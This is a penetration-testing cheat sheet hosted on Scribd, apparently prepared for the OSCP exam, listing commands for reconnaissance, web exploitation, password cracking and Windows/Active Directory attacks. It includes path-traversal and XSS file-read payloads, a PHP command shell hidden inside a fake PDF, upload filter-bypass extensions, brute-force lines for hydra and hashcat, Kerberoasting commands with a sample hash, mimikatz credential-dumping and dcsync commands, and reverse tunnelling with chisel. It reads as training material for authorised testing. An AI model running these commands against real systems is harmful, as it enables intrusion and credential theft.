0% found this document useful (0 votes)
194 views12 pages

Prep

The document provides commands for various tools used in penetration testing and exploitation including Nmap, Feroxbuster, Curl, Gobuster, WPScan, PHP, GitTools, databases, shells, password cracking, Windows and Linux commands, tunneling, and file transfer.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
194 views12 pages

Prep

The document provides commands for various tools used in penetration testing and exploitation including Nmap, Feroxbuster, Curl, Gobuster, WPScan, PHP, GitTools, databases, shells, password cracking, Windows and Linux commands, tunneling, and file transfer.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 12

#### enum

```
nmap -vvv -Pn -sVC -p- -iL hosts.txt -oA scan
sudo nmap -vvv -Pn -sU -p- 192.168.195.222

feroxbuster -u http://10.10.11.3/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-


lowercase.txt

feroxbuster -u http://10.10.11.3/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files-


lowercase.txt

feroxbuster -u http://10.10.11.3/ -w ~/Desktop/oscp/useful/leaky-paths/leaky-paths.txt

add to /etc/hosts
```

#### curl
```
curl -v http://<DOMAIN> // verbose output
curl -X POST http://<DOMAIN> // use POST method
curl -X PUT http://<DOMAIN> // use PUT method
curl --path-as-is http://<DOMAIN>/../../../../../../etc/passwd // use --
path-as-is to handle /../ or /./ in the given URL
curl --proxy http://127.0.0.1:8080 // use proxy
curl -F myFile=@<FILE> http://<RHOST> // file upload
curl${IFS}<LHOST>/<FILE> // Internal Field Separator (IFS) example
```

#### web
```
---jwt
python3 ~/Desktop/oscp/useful/jwt_tool/jwt_tool.py <JWT>

[https://jwt.io](https://jwt.io/)

---lfi
ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u
http://<RHOST>/admin../admin_staging/index.php?page=FUZZ -fs 15349

---xss to lfi
<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>

---api
ffuf -u https://<RHOST>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412

---fuzz with session cookie


ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u
"http://<RHOST>/admin/FUZZ.php" -b "PHPSESSID=a0mjo6ukbkq271nb2rkb1joamp" -fw 2644

---file discovery
ffuf -w /opt/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://<RHOST>/FUZZ -t 30 -c -H
'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -mc
200,204,301,302,307,401,403,500 -ic -
e .7z,.action,.ashx,.asp,.aspx,.backup,.bak,.bz,.c,.cgi,.conf,.config,.dat,.db,.dhtml,.do,.doc,.docm,.docx,.do
t,.dotm,.go,.htm,.html,.ini,.jar,.java,.js,.js.map,.json,.jsp,.jsp.source,.jspx,.jsx,.log,.old,.pdb,.pdf,.phtm,.pht
ml,.pl,.py,.pyc,.pyz,.rar,.rhtml,.shtm,.shtml,.sql,.sqlite3,.svc,.tar,.tar.bz2,.tar.gz,.tsx,.txt,.wsdl,.xhtm,.xhtml,
.xls,.xlsm,.xlst,.xlsx,.xltm,.xml,.zip

---post request
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-
medium.txt -u http://<RHOST>/api/ -e -s 200

---dns recon
gobuster dns -d <RHOST> -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-
5000.txt
gobuster dns -d <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-
top1million-110000.txt

---joomla
[https://github.com/oppsec/juumla](https://github.com/oppsec/juumla)

---drupal
[https://github.com/SamJoan/droopescan](https://github.com/SamJoan/droopescan)

---magento
[https://github.com/steverobbins/magescan](https://github.com/steverobbins/magescan)
```

#### WPScan
```
wpscan --url https://<RHOST> --enumerate u,t,p
wpscan --url https://<RHOST> --plugins-detection aggressive
wpscan --url https://<RHOST> --disable-tls-checks
wpscan --url https://<RHOST> --disable-tls-checks --enumerate u,t,p
wpscan --url http://<RHOST> -U <USERNAME> -P passwords.txt -t 50
```

#### PHP
```
---php-filter
url=php://filter/convert.base64-encode/resource=file:////var/www/<RHOST>/api.php

http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=index
http://<RHOST>/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
base64 -d <FILE>.php

---pdf php inclusion


%PDF-1.4

<?php
system($_G{}ET["cmd"]);
?>
http://<RHOST>/index.php?page=uploads/<FILE>.pdf%00&cmd=whoami

---filter bypass
.sh
.cgi
.inc
.txt
.pht
.phtml
.phP
.Php
.php3
.php4
.php5
.php7
.pht
.phps
.phar
.phpt
.pgif
.phtml
.phtm
.php%00.jpeg

<FILE>.php%20
<FILE>.php%0d%0a.jpg
<FILE>.php%0a
<FILE>.php.jpg
<FILE>.php%00.gif
<FILE>.php\x00.gif
<FILE>.php%00.png
<FILE>.php\x00.png
<FILE>.php%00.jpg
<FILE>.php\x00.jpg
mv <FILE>.jpg <FILE>.php\x00.jpg
```
#### Gittooll
```
./gitdumper.sh http://<RHOST>/.git/ /PATH/TO/FOLDER
./extractor.sh /PATH/TO/FOLDER/ /PATH/TO/FOLDER/
```
#### DB
```
impacket-mssqlclient <USERNAME>@<RHOST>
impacket-mssqlclient <USERNAME>@<RHOST> -windows-auth
sudo mssqlclient.py <RHOST>/<USERNAME>:<USERNAME>@<RHOST> -windows-auth

mongo "mongodb://localhost:27017"

mssql
sqlcmd -S <RHOST> -U <USERNAME>
sqlcmd -S <RHOST> -U <USERNAME> -P '<PASSWORD>'
EXEC master.sys.xp_dirtree N'C:\inetpub\wwwroot\',1,1;

mysql
mysql -u root -p
mysql -u <USERNAME> -h <RHOST> -p
SELECT LOAD_FILE('/etc/passwd')

postgres
psql
psql -h <LHOST> -U <USERNAME> -c "<COMMAND>;"
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>
psql -h <RHOST> -p 5432 -U <USERNAME> -d <DATABASE>

sqsh -S <RHOST> -U <USERNAME>


sqsh -S '<RHOST>' -U '<USERNAME>' -P '<PASSWORD>'
sqsh -S '<RHOST>' -U '.\<USERNAME>' -P '<PASSWORD>'

```

#### Shell
```
(https://github.com/ivan-sincek/php-reverse-shell)
(https://github.com/tennc/webshell)
(https://github.com/TheBinitGhimire/Web-Shells)
```

#### shell upgrade


```
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

#### ftp
```
ftp <RHOST>
wget -r ftp://anonymous:anonymous@<RHOST>
```
#### password
```
hashcat -m 0 md5 /usr/share/wordlists/rockyou.txt
hashcat -m 100 sha-1 /usr/share/wordlists/rockyou.txt
hashcat -m 1400 sha256 /usr/share/wordlists/rockyou.txt
hashcat -m 3200 bcrypt /usr/share/wordlists/rockyou.txt
hashcat -m 900 md4 /usr/share/wordlists/rockyou.txt
hashcat -m 1000 ntlm /usr/share/wordlists/rockyou.txt
hashcat -m 1800 sha512 /usr/share/wordlists/rockyou.txt
hashcat -m 160 hmac-sha1 /usr/share/wordlists/rockyou.txt
hashcat -a 0 -m 0 hash.txt SecLists/Passwords/xato-net-10-million-passwords-1000000.txt -O --force
hashcat -O -m 500 -a 3 -1 ?l -2 ?d -3 ?u --force hash.txt ?3?3?1?1?1?1?2?3

aesrep
hashcat -m 18200 -a 0 <FILE> <FILE>

kerb
hashcat -m 13100 --force <FILE> /usr/share/wordlists/rockyou.txt

hydra <RHOST> -l <USERNAME> -p <PASSWORD> <PROTOCOL>


hydra <RHOST> -L /PATH/TO/WORDLIST/<FILE> -P /PATH/TO/WORDLIST/<FILE>
<PROTOCOL>
hydra -C /usr/share/wordlists/rockyou.txt <RHOST> ftp
hydra -l <USERNAME> -P /PATH/TO/WORDLIST/<FILE> <RHOST> http-post-form
"/admin.php:username=^USER^&password=^PASS^:login_error"
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>
```

#### evil-winrm
```
evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
evil-winrm -i <RHOST> -c /PATH/TO/CERTIFICATE/<CERTIFICATE>.crt -k
/PATH/TO/PRIVATE/KEY/<KEY>.key -p -u -S
```

#### rdp
```
xfreerdp /v:<RHOST> /u:<USERNAME> /p:<PASSWORD> /dynamic-resolution +clipboard
xfreerdp /v:<RHOST> /u:<USERNAME> /d:<DOMAIN> /pth:'<HASH>' /dynamic-resolution
+clipboard
xfreerdp /v:<RHOST> /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla
```

#### smb
```
smbclient -L \\<RHOST>\ -N
smbclient -L //<RHOST>/ -N
smbclient -L ////<RHOST>/ -N
smbclient -L //<RHOST>// -U <USERNAME>%<PASSWORD>
smbclient -U "<USERNAME>" -L \\\\<RHOST>\\
smbclient //<RHOST>/<SHARE> -U <USERNAME>
smbclient //<RHOST>/SYSVOL -U <USERNAME>%<PASSWORD>
smbclient "\\\\<RHOST>\<SHARE>"
smbclient \\\\<RHOST>\\<SHARE> -U '<USERNAME>' --socket-options='TCP_NODELAY
IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
smbclient --no-pass //<RHOST>/<SHARE>
```

#### impacket
```
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format hashcat -outputfile
hashes.asreproast
impacket-GetNPUsers <DOMAIN>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-GetNPUsers <DOMAIN>/<USERNAME> -request -no-pass -dc-ip <RHOST>

impacket-GetUserSPNs -request -dc-ip <RHOST> <DOMAIN>/<USERNAME>


impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip
<DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip 10.10.82.140 'oscp.exam/celia.almeda' -hashes
':e728ecbadfb02f51ce8eed753f3ff3fd'

```
#### windows
```
dir /a
dir /a:d
dir /a:h
dir flag* /s /p
dir /s /b *.log

systeminfo
whoami /all
net user
net user /domain
net user <USERNAME>
tree /f C:\Users\
tasklist /SVC
sc query
sc qc <SERVICE>
netsh firewall show state
schtasks /query /fo LIST /v
findstr /si password *.xml *.ini *.txt
dir /s *pass* == *cred* == *vnc* == *.config*
accesschk.exe -uws "Everyone" "C:\Program Files\"
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
```

#### mimikatz
```
token::elevate
token::revert
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
lsadump::dcsync /<USERNAME>:<DOMAIN>\krbtgt /domain:<DOMAIN>

sekurlsa::minidump /users/admin/Desktop/lsass.DMP
sekurlsa::LogonPasswords
```

#### linux
```
suid/sudo/read
[https://gtfobins.github.io](https://gtfobins.github.io/)

sudo php -S 127.0.0.1:80

id
sudo -l
uname -a
env
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
ls -la /opt
capsh --print
```

#### tunelling
```
reverse
./chisel server -p 9002 -reverse -v
./chisel client <LHOST>:9002 R:3000:127.0.0.1:3000

socks
./chisel server -p 5000 -reverse -v
./chisel client 192.168.45.230:5000 R:socks
```

#### ssh
```

```
#### file trnsfer
```
nc -lnvp <LPORT> < <FILE>
nc <RHOST> <RPORT> > <FILE>
```
#### phishing
```
```

You might also like